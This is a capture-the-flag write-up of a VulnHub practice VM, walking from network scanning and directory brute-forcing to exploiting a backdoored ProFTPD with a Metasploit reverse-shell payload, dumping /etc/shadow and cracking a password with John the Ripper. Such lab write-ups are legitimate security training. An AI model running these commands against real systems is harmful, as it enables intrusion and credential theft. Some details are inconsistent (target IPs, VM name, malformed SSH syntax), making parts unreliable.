- get root access
Hello, and welcome to my first installment of the VulnHub VM Write-ups!
If you never heard of VulnHub, then let me briefly explain what they do. Their purpose is to provide materials that will allow anyone to gain practical ‘hands-on’ experience in digital security, computer software & network administration. Like many other CTF’s, VulnHub in particular was born to cover as many resources as possible, creating a catalogue of ‘stuff’ that is (legally) ‘breakable, hackable & exploitable’ - allowing you to learn in a safe environment and practice ‘stuff’ out. Before we begin, if you would like to try out the Mr.Robot VM, or follow along and learn as I go, then you can download it here!
Alrighty then, I know you’re as eager as me to get your hands dirty with this CTF - so, let’s begin!
As usual, the first thing we do is find the target IP by scanning the machines on the network we are using, using tools such as NetDiscover, Angry IP, etc. Here I'm using NetDiscover, so let's get started.
sudo netdiscover
The IP address 192.168.0.104 will be our target. Once we have it, let's run an Nmap scan to check for open ports and running services.
nmap -sV -sC 192.168.1.113 -Pn
- -sV for version scanning
- -sC scan for default NSE scripts
- -Pn Disable host discovery
basically there are three ports running on my target machine namely :
- port 21/tcp — FTP — (ProFTPD 1.3.3c)
- port 22/tcp — SSH — (OpenSSH 7.2p2 Ubuntu)
- port 80/tcp — HTTP — (Apache httpd 2.4.18)
Okay, so here you can see that port 80 is running, which means the server is running an http website on it. Let's open this website and see what information is there.
Damn, I didn't find any useful information here, so the next step was to brute force the directories and file names in the web application. To enumerate a web page, I'll use the "gobuster" tool. The commands used for enumeration are:
gobuster dir -u http://192.168.0.104/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x .php,.html,.js
Notes :
- -u to specify a URL
- -w to specify a list of words
- -x to print only the specified directory extensions
Check this out!! The output from gobuster shows that there is a directory named /secret showing up with a 301 code which means we can host the /secret directory on my target machine's ip address as "192.168.0.104/secret/", so let's check it out!!
On this webpage, I see a login link. However, when I click on the login link, I get a server not found error. Hmmm,,, This means we need to add the target IP address and hostname as "vtcsec" to our etc/hosts. For this, we'll use the nano text editor and the command "nano etc/hosts". Now let's add the target machine's IP address to ours.
After adding the IP and hostname, then refreshing the page, this is the result I received.
So now we can see the login page. But here we don't know the password. So, what can we do...
After further investigation, the previous Nmap scan showed that port 21 (FTP) was running on ProFTPd version 1.3.3c. That was a bit odd, so I looked for more information on that, and look what I found...
I realized that it was a Backdoor Command Execution exploit in Metasploit. This means I can gain remote access to the target machine. So, let's search for this exploit using searchploit with the following command "searchsploit ProFTPd 1.3.3c" and we will get the following results.
searchsploit ProFTPd 1.3.3c
Here you can see that it is a Compromised Source Backdoor Remote Code Execution.
So, next, run Metasploit to exploit it using "msfconsole" in your favorite terminal. And follow what I do...
So, there's one module included with this exploit. We'll use this module. To use this module, we'll type "use 0" . Then type "show options" to see what options are included in this exploit module.
Here we can see that RHOSTS already exists. We will set RHOSTS to this type: "set RHOSTS 192.168.0.104"
set RHOST 192.168.0.104
To get a reverse shell of the targeted machine, we will use the following command "set payload cmd/unix/reverse"
set payload cmd/unix/reverse
Once the payload is set, we need to check the available options. To do this, we'll type "show options" again and also set LHOST. And here we can see the LHOST is available. We will set the LHOST to this type "set LHOST 192.168.1.101".
Now let's run it and see what happens, type "run" or "exploit" to get a reverse shell and access to the target machine.
And Boom!!, I've got a remote access session, so we can proceed with the attack. Let's get started... Before that, don't forget to use a Python TTY spawn shell to gain access to the interactive system shell. "python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")
Now you can see that we are on the target machine (vtcsec:root). Next, I will see what encrypted passwords are in etc/shadow for further investigation.
Hmm, here we can see that the user marlinspike has a hashed password. Without further ado, I'll copy this hashed text and try to crack the password using the "John the Ripper" tool. We need to create a .txt file and save this hash in it. Open a new terminal and type "nano" and paste the hashed text, then press ctrl+x, then press Y. After that, we will be asked to name the file.
Example :
nano hashes.txt
copy the encrypted password and paste it into hashes.txt, then..
ctrl and x, then Y
After creating the file we will use the command "john --single hashes.txt" replace your file name with hashes.txt and press enter.
john --single hashes.txt
Here we can see that one password has been decrypted, but if you can't see the password, just type this command "john --show hashes.txt" to display the decrypted password.
john --show hashes.txt
I've got the password, and now it's time to check if it's correct. I'll log in to SSH using the username and password I just generated. The command to log in to SSH is "ssh:marlinspike@192.168.0.104".
ssh:marlinspike@192.168.0.104
And Booommmm.... We managed to get root level on remote access... So that's all the steps to solve CTF Basic Pentesting:1
My aim in writing this is only for my learning and if you feel helped by my article, say thank you to yourself, because you are willing to try and continue learning, see you at the next CTF, bye...
